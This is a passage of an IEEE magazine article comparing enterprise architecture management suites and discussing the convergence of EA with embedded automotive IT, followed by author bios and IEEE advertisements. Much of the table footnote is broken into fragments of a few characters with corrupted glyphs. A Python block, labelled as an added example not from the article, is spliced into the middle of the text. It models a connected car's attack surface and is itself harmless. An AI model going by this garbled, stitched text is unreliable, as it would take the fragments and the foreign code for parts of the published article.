Pricing: Free, OSS

Mega Hopex EA suite
Frameworks and standards: • DoDAF, NAF, TOGAF, ArchiMate; different products released for every framework/standard
Usefulness for enterprise architects: • Creates graphical representations of ADM phases to use as a guideline for architecture projects • Maps TOGAF ADM steps and deliverables to the corresponding concepts, reports, and diagrams • Complies with the TOGAF architecture content framework
Usefulness for IT/software practitioners: • Helps practitioners to design and implement agile IT systems, streamlined business processes, and optimized operating frameworks aligned with their business strategies • Advanced reporting features
Pricing: Pricing has to be requested from commercial department

Orbus software iServer
Frameworks and standards: • TOGAF and ArchiMate • DoDAF, MoDAF, FEAF • UML • IT4IT • ITIL
Usefulness for enterprise architects: • Leverage predefined meta models for major standards such as TOGAF and ArchiMate accelerating adoption • Communication improved since architecture views, reports, and dashboards can be published out to key stakeholders and the wider business • Manages the IT Value Chain through the IT4IT Reference Architecture standard
Usefulness for IT/software practitioners: • Import and synchronize data via REST API from CMDBs or other modeling tools and systems • Integration with Office and Visio and other Microsoft tools
Pricing: Pricing has to be requested from commercial department

Planview Enterprise One
Frameworks and standards: • TOGAF certified; however, it uses a proprietary metamodel
Usefulness for enterprise architects: • Supports searchable technology lifecycles and visualizations; EA teams can proactively plan and prioritize technology updates and standardization across the enterprise • Definition of how to achieve the digital strategy with roadmaps that connect programs, projects, capabilities, IT, and investments • Advanced analysis features for business-capability planning, scenario modeling, and impact analysis • Manages application portfolios to achieve business goals
Usefulness for IT/software practitioners: • Visualizes the complex relationships between business capabilities and technologies • Interactive analysis combined with comprehensive modeling reveals dependencies between applications and IT • Collaboration with stakeholders to create technology plans
Pricing: Pricing has to be requested from commercial department

Sparx enterprise architect
Frameworks and standards: • TOGAF, ADM, ArchiMate • BPMN • UML
Usefulness for enterprise architects: • Not a specific-purpose EAM suite • Provides dynamic model simulation that allows architects to verify the correctness of behavioral models and gain a better understanding of how a business system works
Usefulness for IT/software practitioners: • Traceability of EA model elements with code • An integrated software-development environment with a built-in EA modeling tool • Source code round-trip • Many templates for generating code from models, and reverse engineering from several programming languages • Navigation between models and code
Pricing: Four versions: US$229–699/license (standard); US$299–899/license (floating)

QualiWare X
Frameworks and standards: • EA3, Zachman, TOGAF, OIO EA, FEAF-II, DNDAF, ArchiMate, EDML, UML, BPMN, DMN
Usefulness for enterprise architects: • Provides an overview of how the organization executes its strategy and makes complex processes clear for the employees who perform them • Supports risk management and handling uncertainties related to executing the business strategy • Manages application lifecycles and creates overviews of where and for what applications are used
Usefulness for IT/software practitioners: • Estimates the total cost of ownership, return on investment, and business value of IT • Identify redundant IT and make well-informed strategic decisions on technology investments
Pricing: Pricing has to be requested from commercial department

Visual Paradigm enterprise edition
Frameworks and standards: • TOGAF, ArchiMate • PMBOK • UML, ER, DFD
Usefulness for enterprise architects: • Not an EAM tool itself, it is a general-purpose modeling tool that supports EA modeling, but it supports the TOGAF ADM methodology and is ArchiMate compliant • High usability of the graphical modeler
Usefulness for IT/software practitioners: • Supports project-management lifecycle guide-through with agile development features • Integrates the EA repository with other application elements in UML diagrams
Pricing: Subscription: US$89/month; Perpetual: US$2,000

API: application programming interface; PEAF: pragmatic enterprise architecture framework; BIAN: Banking Industry Architecture Network; COBIT: Control Objectives for Information and Related Technologies; ITIL: Information Technology Infrastructure Library; IDEF: integration definition; REST: Representational State Transfer; RDBMS: relational database management system; SQL: structured query language; OSS: open source systems; SaaS: software as a service; SoaML: service oriented architecture Modeling Language; SysML: systems Modeling Language; NAF: NATO Architecture Framework (in a recursive way, NATO: North Atlantic Treaty Organization); MoDAF: Ministry of Defence Architecture Framework; FEAF: federal enterprise architecture framework; IT4IT: information technology for information technology; EA: enterprise architecture; OIO EA: Enterprise Architecture Method for The Danish Ministry of Science, Technology and Innovation; DNDAF: Department of National Defence/Canadian Armed Forces Architecture Framework; EDML: Everywhere Dis

play

s M

arku

p La

ngua

ge; D

MN:

Dec

isio

n M

odel

and

Not

atio

n; P

MBO

K: P

roje

ct

Man

agem

ent B

ody

of K

now

ledg

e; E

R: e

ntity

-rel

atio

nshi

p; D

FD: d

ata

�ow

dia

gram

; CM

DB: c

on�g

urat

ion

man

agem

ent d

atab

ase.

Tool

Fram

ewor

ks a

nd s

tand

ards

Usef

ulne

ss fo

r ent

erpr

ise

arch

itect

sUs

eful

ness

for I

T/so

ftw

are

prac

titio

ners

Pric

ing

TABL

E 1.

EA

M s

uite

s (c

ont.)

.

API:

appl

icat

ion

prog

ram

min

g in

terf

ace;

PEA

F: p

ragm

atic

ent

erpr

ise

arch

itect

ure

fram

ewor

k; B

IAN

: Ban

king

Indu

stry

Arc

hite

ctur

e N

etw

ork;

CO

BIT:

Con

trol

Obj

ectiv

es fo

r Inf

orm

atio

n an

d Re

late

d Te

chno

logi

es; I

TIL:

Info

rmat

ion

Tech

nolo

gy In

fras

truc

ture

Li

brar

y; ID

EF: i

nteg

ratio

n de

finiti

on; R

EST:

Repr

esen

tatio

nal S

tate

Tra

nsfe

r; RD

BMS:

rela

tiona

l dat

abas

e m

anag

emen

t sys

tem

; SQ

L: s

truc

ture

d qu

ery

lang

uage

; OSS

: ope

n so

urce

sys

tem

s; S

aaS:

soft

war

e as

a s

ervi

ce; S

oaM

L: s

ervi

ce o

rient

ed a

rchi

tect

ure

Mod

elin

g La

ngua

ge; S

ysM

L: s

yste

ms

Mod

elin

g La

ngua

ge; N

AF: N

ATO

Arc

hite

ctur

e Fr

amew

ork

(In a

recu

rsiv

e w

ay, N

ATO

, Nor

th A

tlant

ic T

reat

y O

rgan

izat

ion)

; MoD

AF: M

inis

try

of D

efen

ce A

rchi

tect

ure

Fram

ewor

k; F

EAF:

fede

ral-e

nter

pris

e-ar

chite

ctur

e-fr

amew

ork;

IT

4IT:

info

rmat

ion

tech

nolo

gy fo

r inf

orm

atio

n te

chno

logy

; EA:

ent

erpr

ise

arch

itect

ure;

OIO

EA:

Ent

erpr

ise

Arch

itect

ure

Met

hod

for T

he D

anis

h M

inis

try

of S

cien

ce, T

echn

olog

y an

d In

nova

tion;

DN

DAF

: Dep

artm

ent o

f Nat

iona

l Def

ence

/Can

adia

n Ar

med

For

ces

Arch

itect

ure

Fram

ewor

k; E

DM

L: E

very

whe

re D

ispl

ays

Mar

kup

Lang

uage

; DM

N: D

ecis

ion

Mod

el a

nd N

otat

ion;

PM

BOK:

Pro

ject

Man

agem

ent B

ody

of K

now

ledg

e; E

R: e

ntit

y-re

latio

nshi

p; D

FD: d

ata

flow

dia

gram

; CM

DB:

con

figur

atio

n m

anag

emen

t dat

abas

e.


› EAM can be used for consolidating certain applications and technology in organizations. As a result, technology-management costs can be reduced or at least controlled.

› An appropriate EAM implementation can improve technology-management planning, as well as the effectiveness of IT investments, since these concerns are aligned with the company’s strategy.

› EA is an additional tool to manage an application portfolio. Thus, EAM contributes by improving quality and reducing the risk of software delivery. From a broader point of view, IT asset portfolios can also be managed through a single repository in an EAM tool. Aside from applications, this portfolio also includes infrastructure, IT resources, and services.

› EA improves engagement, analysis, and communication skills. Practitioners can realize and understand the business concerns supported by (and aligned with) the applications they develop or the IT infrastructures they manage on a daily basis.

› Since EAM is a mechanism for making relevant decisions at the strategic level, IT/software practitioners should be able to model certain EA views from the IT/software assets they manage in an inductive way (e.g., with reverse-engineering techniques), while keeping these models aligned with the overall business strategy.

THE CONVERGENCE OF EA AND EMBEDDED IT

The traditional division between IT and embedded systems is disappearing. Increasingly, embedded systems and devices have over-the-air connectivity for software upgrades, feature activation, and cloud services such as predictive maintenance. Conversely, IT solutions connect to devices and create the Internet of Things (IoT). Embedded electronics, such as micro devices with sensors and actuators connected through the IoT, facilitate ubiquity. Data analytics, cloud storage and services, convergent interactivity and cognition, augmented reality with visualization and simulation, pattern recognition, machine learning, and artificial intelligence facilitate a convergence of IT and embedded systems.1 Underlying these, we identify enabling methods, techniques, and tools, such as agile scaling and blockchain, to ensure security and trust in distributed transactions, as well as microservices and open application programming interfaces that support software architectures.

EA adoption has been increasing; it can be used for planning, aligning, controlling, and organizing system complexity, which is a growing problem for IT and SW project managers. The increased complexity is due to the convergence of several trends.

› There is a broad spectrum of IT infrastructure that supports IS (e.g., cloud, IoT, edge computing, and so forth).

› The internal structure of SW systems has grown, with more layers and new component types or architectural paradigms, such as SOA and microservices.

› Customers are demanding more, in less time and with fewer problems, which has led to new ways of working (e.g., Lean, Agile, and DevOps).

These new software architectures and IT devices cannot be developed in isolation, without paying attention to business goals and enterprise drivers, which makes EAM critical. ArchiMate version 3 has been extended with a physical sublayer,4 with which it is now possible to model and manage all kinds of cyberphysical system elements, such as embedded software or IoT sensors, in an integrated way. For example, it can be used for full traceability between all of the components of a car: hardware, software, and purely physical non-IT parts.

The convergence of enterprise IT and embedded systems can best be observed in the fast-changing automotive market. A modern car has 50–120 embedded microcontrollers and is connected by various external interfaces to a variety of cloud and infotainment technologies. Each of those external interfaces is also an entry point into the vehicle, so an EA model that is kept for traceability should also record which elements are reachable from outside. Onboard software is in the range of hundreds of millions of lines of code and growing exponentially. Automotive software product lines and variants are among the largest and most complex in all industries. It is said that the automobile is rapidly becoming a “computer on wheels.” Automotive original equipment manufacturers are implementing cars with next-generation production processes and vehicles with connected embedded sensors and actuators to obtain better intelligence and control. They adopt information and communication technology workflows from their IT systems to each single car. From a user experience perspective, the evolution is even more drastic. People have been buying cars for decades, but they now want mobility services. The car per se has ceased to attract users. This is best seen at the latest OOP IT conference (#OOPmuc), where global market leader Volkswagen boasted that they are hiring the people who want to get rid of cars.
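The "full traceability between all of the components of a car" that the article attributes to ArchiMate 3 is, in practice, a set of graph queries over the EA repository, and the same queries answer the security reviewer's questions about the car's external interfaces. The following Python is an added example, not code from the article or from any of the tools in Table 1 (it also serves the "traceability of EA model elements" row there). It builds a toy ArchiMate-3-style model of a connected car whose element names, layers and relations are all constructed assumptions, then asks two things of it: what an externally reachable interface can transitively influence, and what a business service transitively rests on.

```python
from __future__ import annotations

from collections import defaultdict, deque
from dataclasses import dataclass

# Constructed example, not from the article or any EAM tool: a toy
# ArchiMate-3-style model of a connected car. Layer names follow ArchiMate 3;
# every element and relation below is an assumption made for illustration.


@dataclass(frozen=True)
class Element:
    name: str
    layer: str              # "business" | "application" | "technology" | "physical"
    external: bool = False  # True for interfaces reachable from outside the vehicle


class EAModel:
    """Directed graph kept in the 'supports' direction: an edge A -> B means
    B depends on A (A realizes, serves, or is assigned to B)."""

    def __init__(self) -> None:
        self.elements: dict[str, Element] = {}
        self.supports: dict[str, set[str]] = defaultdict(set)
        self.depends_on: dict[str, set[str]] = defaultdict(set)

    def add(self, *elements: Element) -> None:
        for e in elements:
            self.elements[e.name] = e

    def relate(self, source: str, relation: str, target: str) -> None:
        # `relation` is kept only so the model-building code reads like ArchiMate.
        if source not in self.elements or target not in self.elements:
            raise KeyError(f"unknown element in {source} -{relation}-> {target}")
        self.supports[source].add(target)
        self.depends_on[target].add(source)

    def _walk(self, start: str, adjacency: dict[str, set[str]]) -> set[str]:
        """Breadth-first transitive closure of `start` over `adjacency`, excluding start."""
        if start not in self.elements:
            raise KeyError(start)
        seen: set[str] = set()
        queue = deque([start])
        while queue:
            current = queue.popleft()
            for nxt in adjacency[current]:
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append(nxt)
        return seen

    def impact(self, name: str) -> set[str]:
        """Everything that transitively depends on `name` (affected if it is compromised)."""
        return self._walk(name, self.supports)

    def foundations(self, name: str) -> set[str]:
        """Everything `name` transitively rests on (downward traceability to hardware)."""
        return self._walk(name, self.depends_on)

    def attack_surface_reach(self) -> dict[str, set[str]]:
        """For each externally reachable element, what it can transitively influence."""
        return {e.name: self.impact(e.name) for e in self.elements.values() if e.external}

    def by_layer(self, names) -> dict[str, list[str]]:
        """Group element names by ArchiMate layer, sorted for stable output."""
        grouped: dict[str, list[str]] = defaultdict(list)
        for n in sorted(names):
            grouped[self.elements[n].layer].append(n)
        return dict(grouped)


def build_demo_model() -> EAModel:
    """Constructed sample model; element names are assumptions, not real vehicle data."""
    m = EAModel()
    m.add(
        Element("Cellular OTA interface", "technology", external=True),
        Element("OBD-II port", "technology", external=True),
        Element("Telematics gateway", "technology"),
        Element("CAN bus", "technology"),
        Element("Brake ECU", "physical"),
        Element("Head unit", "physical"),
        Element("OTA update service", "application"),
        Element("Brake control firmware", "application"),
        Element("Navigation app", "application"),
        Element("Predictive maintenance", "business"),
        Element("Mobility service", "business"),
    )
    m.relate("Cellular OTA interface", "serves", "Telematics gateway")
    m.relate("OBD-II port", "serves", "CAN bus")
    m.relate("Telematics gateway", "serves", "CAN bus")
    m.relate("CAN bus", "serves", "Brake ECU")
    m.relate("Telematics gateway", "serves", "Head unit")
    m.relate("Brake ECU", "assignment", "Brake control firmware")
    m.relate("Head unit", "assignment", "Navigation app")
    m.relate("Telematics gateway", "assignment", "OTA update service")
    m.relate("OTA update service", "serves", "Brake control firmware")  # update path
    m.relate("OTA update service", "realizes", "Predictive maintenance")
    m.relate("Navigation app", "realizes", "Mobility service")
    m.relate("Brake control firmware", "realizes", "Mobility service")
    return m


if __name__ == "__main__":
    model = build_demo_model()
    for entry, reach in model.attack_surface_reach().items():
        print(f"{entry} can influence: {model.by_layer(reach)}")
    print("Mobility service rests on:", model.by_layer(model.foundations("Mobility service")))
```

The two walks are the same closure in opposite directions: `foundations` is the traceability the article describes (business service down to ECU and bus), while `impact` run from every element marked `external` turns that same repository into an attack-surface view, which is the check a reviewer wants before adding another over-the-air interface to the model.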

REFERENCES

1. C. Ebert and C. H. C. Duarte, “Digital transformation,” IEEE Softw., vol. 35, no. 4, pp. 16–21, 2018.

2. M. Lankhorst, Enterprise Architecture at Work: Modelling, Communication and Analysis. Berlin: Springer-Verlag, 2017.

3. The Open Group, “TOGAF, enterprise ed., version 9.1,” U.K., 2011. [Online]. Available: http://www.togaf.org

4. The Open Group, “The ArchiMate 3.0 enterprise architecture modeling language,” U.K., 2016. [Online]. Available: http://www.opengroup.org/subjectareas/enterprise/archimate-overview

5. H. Shah and M. E. Kourdi, “Frameworks for enterprise architecture,” IT Prof., vol. 9, no. 5, pp. 36–41, 2007.

6. C. Ebert and A. Dubey, “Convergence of enterprise IT and embedded systems,” IEEE Softw., vol. 36, no. 3, pp. 92–97, May 2019.

RICARDO PEREZ-CASTILLO is a researcher at the Information Technologies and Systems Institute, University of Castilla-La Mancha (UCLM), Spain. His research interests include architecture-driven modernization, model-driven development, business-process archaeology, and enterprise architecture. Perez-Castillo received a Ph.D. in computer science from UCLM. Contact him at [email protected].

FRANCISCO RUIZ is a full professor at the Information Technologies and Systems Institute, University of Castilla-La Mancha (UCLM), Spain. His research interests include enterprise architecture, business-process technology, and software engineering. Ruiz received a Ph.D. in computer science from UCLM. Contact him at [email protected].

MARIO PIATTINI is the director of the Alarcos Research Group and a full professor at the University of Castilla-La Mancha, Spain. His research interests include software and data quality, information-systems audit and security, and IT governance. Piattini received a Ph.D. in computer science from Madrid Technical University, Spain. Contact him at mario [email protected].

CHRISTOF EBERT is the managing director of Vector Consulting Services and is a professor at the University of Stuttgart, Germany, and the Sorbonne, Paris. He is on the editorial board of IEEE Software. He is a Senior Member of the IEEE. Contact him at [email protected].

Call for Articles

IEEE Software seeks practical, readable articles that will appeal to experts and nonexperts alike. The magazine aims to deliver reliable information to software developers and managers to help them stay on top of rapid technology change. Submissions must be original and no more than 4,700 words, including 250 words for each table and figure.

Author guidelines: www.computer.org/software/author

Further details: [email protected]

www.computer.org/software

IEEE Quantum Week 2020 (new event), 12–16 October 2020. Registration is open: qce.quantum.ieee.org

The Future Directions Quantum Initiative invites you to IEEE Quantum Week 2020, the inaugural IEEE International Conference on Quantum Computing and Engineering (QCE). Council on Superconductivity.

CALL FOR SPECIAL ISSUE PROPOSALS

Computer solicits special issue proposals from lead experts. Proposed themes/issues should address timely, emerging topics that will be of broad interest to Computer’s readership. Special issues are an important component of Computer, as they deliver essential research insights and well-developed perspectives on new and established technologies and computing strategies.

We encourage submissions of high-quality proposals for the 2021 editorial calendar. Of particular interest are proposals centered on:

• offsite educational and business continuity technology challenges,

• privacy related to personal location tracking and surveillance (digital and physical),

• artificial intelligence and machine learning,

• technology’s role in disrupted supply chains,

• misinformation and disinformation (fake information, malicious or non-malicious), and

• cyberwarfare/cyberterrorism.

Proposal guidelines are available at: www.computer.org/csdl/magazine/co/write-for-us/15911

Deadline for proposal submission: 15 September 2020

[Cover images of past Computer issues, www.computer.org/computer: April 2020, vol. 53 no. 4 (Complexity versus Trust); March 2020, vol. 53 no. 3 (Data Analysis and Cyberphysical Systems); April 2016, vol. 49 no. 4 (Big Data; Faster Patenting, p. 10; Skin in the UI Game, p. 83); January 2020, vol. 53 no. 1 (Outlook); October 2016, vol. 49 no. 10 (Energy-Efficient Computing); February 2020, vol. 53 no. 2 (Digital Health: E-Coaching and Remote Monitoring); May 2016, vol. 49 no. 5 (Emergency Response; IoT Standards, p. 87; Cybersecurity’s Formal Methodists, p. 102); December 2019, vol. 52 no. 12 (Technology Predictions); June 2016, vol. 49 no. 6 (Security Threats; To Robot, With Love, p. 88; Fun With Sentient Tools, p. 95); October 2019, vol. 52 no. 10 (50 Years of Networking; A Half-Century of the Arpanet, p. 14).]

[Cover images of IEEE Security & Privacy issues, www.computer.org/security: November/December 2018, Vol. 16, No. 6 (Cybersecurity and Privacy Issues in Brazil; Software and Cybersecurity; Big Data: Privacy Versus Accessibility; Resiliency in Cloud Computing); May/June 2018, Vol. 16, No. 3 (AI Ethics; E-Currency and Fairness; Ransomware Defense; A National Cybersecurity Policy); March/April 2019, Vol. 17, No. 2 (Privacy and Automated Airport Screening); January/February 2019, Vol. 17, No. 1 (Digital Forensics, Part 2; Blockchain Technologies; The Fuzzing Revival; Cybersecurity for the Public Interest).]

Join the IEEE Computer Society for subscription discounts today! www.computer.org/product/magazines/security-and-privacy

IEEE Security & Privacy is a bimonthly magazine communicating advances in security, privacy, and dependability in a way that is useful to a broad section of the professional community.

The magazine provides articles with both a practical and research bent by the top thinkers in the field of security and privacy, along with case studies, surveys, tutorials, columns, and in-depth interviews. Topics include:

• Internet, software, hardware, and systems security
• Legal and ethical issues and privacy concerns
• Privacy-enhancing technologies
• Data analytics for security and privacy
• Usable security
• Integrated security design methods
• Security of critical infrastructures
• Pedagogical and curricular issues in security education
• Security issues in wireless and mobile networks
• Real-world cryptography
• Emerging technologies, operational resilience, and edge computing
• Cybercrime and forensics, and much more

www.computer.org/security

[Cover images of IEEE Internet Computing issues, www.computer.org/internet: Vol. 22, No. 4, July/August 2018 (Evolution of Rack-Scale Systems); Vol. 22, No. 2, March/April 2018 (Healthcare Informatics and Privacy); Vol. 22, No. 3, May/June 2018 (Connected and Autonomous Vehicles); Vol. 22, No. 1, January/February 2018 (IoT-Enhanced Human Experience).]

Join the IEEE Computer Society for subscription discounts today! www.computer.org/product/magazines/internet-computing

IEEE Internet Computing delivers novel content from academic and industry experts on the latest developments and key trends in Internet technologies and applications.

Written by and for both users and developers, the bimonthly magazine covers a wide range of topics, including:

• Applications
• Architectures
• Big data analytics
• Cloud and edge computing
• Information management
• Middleware
• Security and privacy
• Standards
• And much more

In addition to peer-reviewed articles, IEEE Internet Computing features industry reports, surveys, tutorials, columns, and news.

www.computer.org/internet

66 August 2020 Published by the IEEE Computer Society 2469-7087/20 © 2020 IEEE

Conference Calendar

IEEE Computer Society conferences are valuable forums for learning on broad and dynamically shifting topics from within the computing profession. With over 200 conferences featuring leading experts and thought leaders, we have an event that is right for you. Questions? Contact [email protected].

SEPTEMBER

7 September
• EuroS&P (IEEE European Symposium on Security & Privacy), virtual

14 September
• CLUSTER (IEEE Int’l Conf. on Cluster Computing), virtual

21 September
• ASE (IEEE/ACM Int’l Conf. on Automated Software Eng.), Melbourne, Australia

24 September
• BigMM (IEEE Int’l Conf. on Multimedia Big Data), virtual

27 September
• ICSME (IEEE Int’l Conf. on Software Maintenance and Evolution), virtual

28 September
• SecDev (IEEE Secure Development), virtual

OCTOBER

3 October
• PACT (Int’l Conf. on Parallel Architectures and Compilation Techniques), virtual

5 October
• EDOC (IEEE Int’l Enterprise Distributed Object Computing Conf.), virtual

12 October
• ISSRE (IEEE Int’l Symposium on Software Reliability Eng.), virtual

16 October
• ICEBE (IEEE Int’l Conf. on e-Business Eng.), Guangzhou, China

17 October
• MICRO (IEEE/ACM Int’l Symposium on Microarchitecture), Athens, Greece

18 October
• ICCD (IEEE Int’l Conf. on Computer Design), virtual
• MODELS (ACM/IEEE Int’l Conf. on Model-Driven Eng. Languages and Systems), Montreal, Canada

19 October
• DFT (IEEE Int’l Symposium on Defect and Fault Tolerance in VLSI and Nanotechnology Systems), Frascati, Italy

21 October
• FIE (IEEE Frontiers in Education Conf.), Uppsala, Sweden

25 October
• VIS (IEEE Visualization Conf.), virtual

NOVEMBER

6 November
• CCEM (IEEE Int’l Conf. on Cloud Computing in Emerging Markets), virtual
• SmartCloud (IEEE Int’l Conf. on Smart Cloud), Washington, DC, USA

9 November
• ICTAI (IEEE Int’l Conf. on Tools with Artificial Intelligence), virtual
• IRC (IEEE Int’l Conf. on Robotic Computing), Taichung, Taiwan
• ISMVL (IEEE Int’l Symposium on Multiple-Valued Logic), Miyazaki, Japan

11 November
• SEC (IEEE/ACM Symposium on Edge Computing), San Jose, USA

15 November
• SC, Atlanta, USA

16 November
• FOCS (IEEE Symposium on Foundations of Computer Science), Durham, USA
• LCN (IEEE Conf. on Local Computer Networks), Sydney, Australia

29 November
• ICDCS (IEEE Int’l Conf. on Distributed Computing Systems), Singapore

30 November
• ICHI (IEEE Int’l Conf. on Healthcare Informatics), Oldenburg, Germany

DECEMBER

2 December
• CSDE (IEEE Asia-Pacific Conf. on Computer Science and Data Eng.), Gold Coast, Australia
• ISM (IEEE Int’l Symposium on Multimedia), Naples, Italy

6 December
• HOST (IEEE Int’l Symposium on Hardware-Oriented Security and Trust), San Jose, USA

7 December
• BDCAT (IEEE/ACM Int’l Conf. on Big Data Computing, Applications and Technologies), virtual
• UCC (IEEE/ACM Int’l Conf. on Utility and Cloud Computing), virtual

9 December
• CC (IEEE Int’l Conf. on Conversational Computing), Irvine, USA
• AIKE (IEEE Int’l Conf. on Artificial Intelligence and Knowledge Eng.), Irvine, USA

10 December
• BigData (IEEE Int’l Conf. on Big Data), virtual

14 December
• CloudCom (IEEE Int’l Conf. on Cloud Computing Technology and Science), Bangkok, Thailand
• HPCC (IEEE Int’l Conf. on High Performance Computing and Communications), Cuvu, Fiji

16 December
• BIBM (IEEE Int’l Conf. on Bioinformatics and Biomedicine), virtual
• HiPC (IEEE Int’l Conf. on High-Performance Computing, Data, and Analytics), virtual

29 December
• BigDataSE (IEEE Int’l Conf. on Big Data Science and Eng.), Guangzhou, China
• EUC (IEEE Int’l Conf. on Embedded and Ubiquitous Computing), Guangzhou, China
• TrustCom (IEEE Int’l Conf. on Trust, Security and Privacy in Computing and Communications), Guangzhou, China

2021

JANUARY

5 January
• WACV (IEEE Winter Conf. on Applications of Computer Vision), Waikoloa, USA

17 January
• BigComp (IEEE Int’l Conf. on Big Data and Smart Computing), Bangkok, Thailand

27 January
• ICSC (IEEE Int’l Conf. on Semantic Computing), Laguna Hills, USA

MARCH

22 March
• PerCom (IEEE Int’l Conf. on Pervasive Computing and Communications), Kassel, Germany
• MIPR (IEEE Int’l Conf. on Multimedia Information Processing and Retrieval), Tokyo, Japan

APRIL

12 April
• ICST (IEEE Conf. on Software Testing, Verification and Validation), Porto de Galinhas, Brazil

MAY

17 May
• IPDPS (IEEE Int’l Parallel and Distributed Processing Symposium), Portland, Oregon, USA

23 May
• SP (IEEE Symposium on Security and Privacy), San Francisco, USA

Learn more about IEEE Computer Society conferences: computer.org/conferences

Get Published in the New IEEE Open Journal of the Computer Society

Submit a paper today to the premier new open access journal in computing and information technology. Your research will benefit from the IEEE marketing launch and 5 million unique monthly users of the IEEE Xplore® Digital Library. Plus, this journal is fully open and compliant with funder mandates, including Plan S.

Submit your paper today! Visit www.computer.org/oj to learn more.